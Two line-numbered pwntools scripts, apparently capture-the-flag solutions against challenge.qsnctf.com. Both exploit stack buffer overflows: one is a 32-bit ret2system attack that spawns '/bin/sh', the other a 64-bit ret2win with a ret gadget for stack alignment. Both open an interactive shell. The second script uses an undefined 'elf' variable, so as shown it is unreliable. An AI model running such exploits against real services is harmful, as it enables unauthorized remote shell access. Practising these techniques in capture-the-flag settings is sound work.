1
from pwn import *
2
context.log_level = 'debug'
3
context.arch = 'i386' # 32位程序
4
filename = 'C:\\Users\\CodeAtlantis\\Downloads\\附件\\pwn'
5
elf = ELF(filename)
6

7
io = remote('challenge.qsnctf.com', 45526)
8

9
try:
10
    sys_addr = elf.symbols['system']
11
    print(f"system address: {hex(sys_addr)}")
12
except:
13
    print("Error: 找不到 system 函数符号")
14
    exit()
15

16
try:
17
    # 尝试搜索 "/bin/sh"
18
    bin_sh_addr = next(elf.search(b'/bin/sh'))
19
    print(f"'/bin/sh' address: {hex(bin_sh_addr)}")
20
except StopIteration:
21
    try:
22
        # 如果找不到 /bin/sh，尝试搜索 "sh"
23
        print("Warning: '/bin/sh' not found, trying 'sh'")
24
        bin_sh_addr = next(elf.search(b'sh\x00'))
25
        print(f"'sh' address: {hex(bin_sh_addr)}")
26
    except StopIteration:
27
        print("Error: 程序中找不到 '/bin/sh' 或 'sh' 字符串。")
28
        print("可能需要 Ret2Libc 攻击，这需要更复杂的步骤。")
29
        exit()
30

31
offset = 0x10 + 4
32

33
payload = flat([
34
    b'A' * offset,      # 填充数据，覆盖缓冲区和EBP
35
    sys_addr,           # 覆盖返回地址，跳转到 system
36
    0xdeadbeef,         # system 执行完后的返回地址 (随便填，不重要)
37
    bin_sh_addr         # system 的第一个参数 (指向 "/bin/sh" 的指针)
38
])
39

40
# 6. 发送攻击
41
io.recvuntil(b'please input:') # 根据题目实际输出调整
42
io.sendline(payload)
43

44
# 7. 交互
45
io.interactive()

1
from pwn import *
2
context.arch = 'amd64'
3
context.log_level = 'debug'
4
binary_name = 'C:\\Users\\CodeAtlantis\\Downloads\\app\\pwn'
5
io = remote('challenge.qsnctf.com', 45529)
6

7
try:
8
    fun_addr = elf.symbols['fun']
9
except:
10
    fun_addr = 0x401156
11

12
print(f"Target Function Address: {hex(fun_addr)}")
13

14
rop = ROP(elf)
15

16
ret_addr = rop.find_gadget(['ret'])[0]
17
print(f"Found RET gadget: {hex(ret_addr)}")
18

19
offset = 24
20

21
payload = flat([
22
    b'A' * offset,  # 填充 24 字节
23
    ret_addr,       # <--- 这里加一个 ret，用于对齐栈 (RSP+8)
24
    fun_addr        # 最后跳转到 fun (里面调用了 system)
25
])
26

27
io.recvuntil(b'please input:')
28
io.sendline(payload)
29

30
io.interactive()